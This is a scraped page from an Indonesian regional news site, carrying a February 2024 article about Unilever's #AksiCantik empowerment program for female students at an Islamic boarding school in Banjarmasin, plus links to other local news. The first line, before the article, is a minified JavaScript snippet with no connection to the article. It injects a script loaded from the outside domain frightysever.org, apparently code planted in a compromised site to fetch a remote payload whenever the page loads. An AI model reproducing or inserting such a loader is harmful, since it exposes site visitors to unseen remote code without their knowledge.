(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Program #AksiCantik Memberdayakan Perempuan Muslimah Muda di Ponpes Al Hikmah Banjarmasin


KANALKALIMANTAN.COM, BANJARMASIN – Perempuan seringkali dilihat hanya dari segi sebatas kecantikan dan penampilan fisik saja. Padahal cantik yang sesungguhnya itu terpancar dari kebaikan hati dan tindakan yang berdampak dan berkelanjutan.

Aksi cantik bukan perihal merawat diri saja, tetapi juga tentang merawat aksi kebaikan.

Sunsilk, Citra dan Glow & Lovely sangat memahami kondisi yang kini sedang dialami oleh banyak perempuan dan dengan aksi positifnya membantu memberdayakan para perempuan muda terutama perempuan muslimah melalui program #AksiCantik.

Baca juga: Duh Maling! Lantai Halte 0 Kilometer Depan Masjid Sabilal Muhtadin Diembat

Sandeep Kohli, Direktur Beauty dan Wellbeing Unilever Indonesia mengungkapkan, sejalan dengan komitmen Unilever untuk selalu mendukung komunitas muslim di Indonesia, sebagai aksi positif dan wujud nyata yang berkelanjutan, Sunsilk, Citra dan Glow & Lovely menyelenggarakan serangkaian kegiatan womenpreneur, women education & craftpreneur bagi para perempuan muslimah muda di Pondok Pesantren (Ponpes) Al Hikmah Kelayan, Banjarmasin.

“Kami menjalankan banyak program edukasi dan enterpreneurship yang ditujukan untuk meningkatkan kualitas dan pemberdayaan perempuan muslim di Indonesia. Semoga kegiatan positif ini dapat menjangkau, menyentuh dan berdampak bagi lebih banyak lagi santriwati di seluruh Indonesia,” ucap Sandeep Kohli, Jumat (23/2/2024).

Dia menyebutkan, kegiatan diikuti oleh 600 santriwati Ponpes Al Hikmah Kelayan, merupakan ajakan untuk memulai aksi kebaikan melalui pemberdayaan perempuan.

Kegiatan turut didukung dan dihadiri oleh perwakilan dari Kementerian Agama (Kemenag) Provinsi Kalimantan Selatan (Kalsel) H Ahmad Sawiti SAg MHI dan Pimpinan Ponpes Al Hikmah Ustadz H Agus Salim Lc MHI.

Baca juga: Mini Course Jurnalistik PLN UPT Banjarbaru, Belajar Ambil Sisi Menarik dalam Menulis

Dukungan dan sambutan hangat disampaikan H Ahmad Sawiti, Kepala Bidang Pendidikan Agama dan Pendidikan Keagamaan Islam Kantor Wilayah Kemenag Provinsi Kalsel. Dimana pihaknya sangat berterima kasih dan mendukung penuh kerja sama antara Kementerian Agama dan Unilever yang sudah terbangun sejak 2021 melalui berbagai kegiatannya sehingga di tahun ini kegiatan #AksiCantik ini dapat terselenggara di Ponpes Al Hikmah Kelayan, Banjarmasin

“Alhamdulillah melalui kegiatan ini dapat memberikan manfaat terutama dalam hal pendidikan dan berbisnis diharapkan memotivasi para santriwati untuk terus meraih dan mewujudkan cita-citanya,” ungkapnya.

Selain itu, Ahmad Sawiti juga berharap agar program #AksiCantik seperti ini dapat meluas dan menjangkau lebih banyak lagi Pondok Pesantren di Provinsi Kalsel.

“Program dan aksi nyata ini tidak hanya memberikan inspirasi, tetapi juga menggarisbawahi pentingnya pemberdayaan perempuan sebagai bagian dari aksi kebaikan untuk membangun cantik yang sesungguhnya bagi para perempuan muslimah muda di Banjarmasin,” tutup Ahmad Sawiti.

Baca juga: HPSN 2024 di Danau Panggang, Warga Bersihkan Sampah Plastik di Sungai dan Dermaga

Dalam upaya mewujudkan pemberdayaan perempuan, Sunsilk, Citra, dan Glow & Lovely telah mengambil langkah konkret melalui program #AksiCantik yang dirancang untuk membantu perempuan, khususnya perempuan muslimah.

Dengan memberikan wadah dan peluang untuk membangun aksi kebaikan. Beberapa perempuan muda menginspirasi juga dihadirkan sebagai pemateri dalam kegiatan ini, diantaranya Marsha Natika, Content Creator dan Business Woman, dalam sesi talkshow bersama Sunsilk yang mengusung tema tema “Buat Bisnismu Lebih Berkilau di Dunia Digital!”.

Enta Fadila, penerima beasiswa LPDP RI dan Co Founder dari Ourdee.id, dalam sesi kelas dan talk show bersama Glow & Lovely yang membawakan tema “Pendidikan Tinggi untuk Raih Glowingmu dan Wujudkan Cita-citamu”.

Ayu Muniarti, Seniman dan Craftpreneur, dalam sesi kelas dan talk show bersama Citra yang mengusungkan tema “Kembangkan Kreativitas dan Mulai Bisnismu”

Baca juga: Empat SOPD di Pemkab Kapuas Digabung Jadi Dua

Dengan hadirnya ragam aksi positif yang terus memperkuat pemberdayaan santriwati untuk terus melakukan aksi baiknya dalam bidang pendidikan, bisnis maupun kehidupan sehari-hari.
Mari gaungkan kebaikan sebagai wujud nyata kecantikan lewat #AksiCantik. (Kanalkalimantan.com/Rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Gelar FKP, Usaha Balai Besar Labkesmas Banjarbaru Tingkatan Pelayanan

KANALKALIMANTAN.COM, BANJARBARU - Balai Besar Laboratorium Kesehatan Masyarakat (BB Labkesmas) Banjarbaru Kalimantan Selatan (Kalsel) menerima… Read More

8 jam ago

“Dialektika di Ujung Joran” Dapur Budaya HSS Juara Kompetisi Film Pendek Dispersip Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Kompetisi film pendek yang diselenggarakan Dinas Perpustakaan dan Kearsipan (Dispersip) Provinsi Kalimantan… Read More

9 jam ago

Diduga Timbulkan Aroma Tak Sedap, DLH Banjarbaru Minta Aeris Hotel Cek IPAL

KANALKALIMANTAN.COM, BANJARBARU - Instalasi pengolahan air limbah milik Aeris Hotel diduga mengeluarkan aroma tak sedap.… Read More

9 jam ago

Kasus Penusukan Siswa SMAN 7 Banjarmasin, ABH Dijatuhi Hukuman Pembinaan 1 Tahun

KANALKALIMANTAN.COM, BANJARMASIN - Hakim Pengadilan Negeri (PN) Banjarmasin menyatakan Anak yang Berhadapan dengan Hukum (ABH),… Read More

10 jam ago

Wujudkan Keinginan Masyarakat, Saidi Mansyur Resmikan Pasar Hewan Karangintan

KANALKALIMANTAN.COM, MARTAPURA - Pasar Hewan Karangintan dan Kontes Ternak Kabupaten Banjar 2024, di Desa Padang… Read More

11 jam ago

Satu Wasaka Award 2024, Tim Juri Sambangi Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sehubungan dengan adanya Sanitasi dan Air Minum Tuntas Waja Sampai Kaputing (Satu… Read More

15 jam ago

This website uses cookies.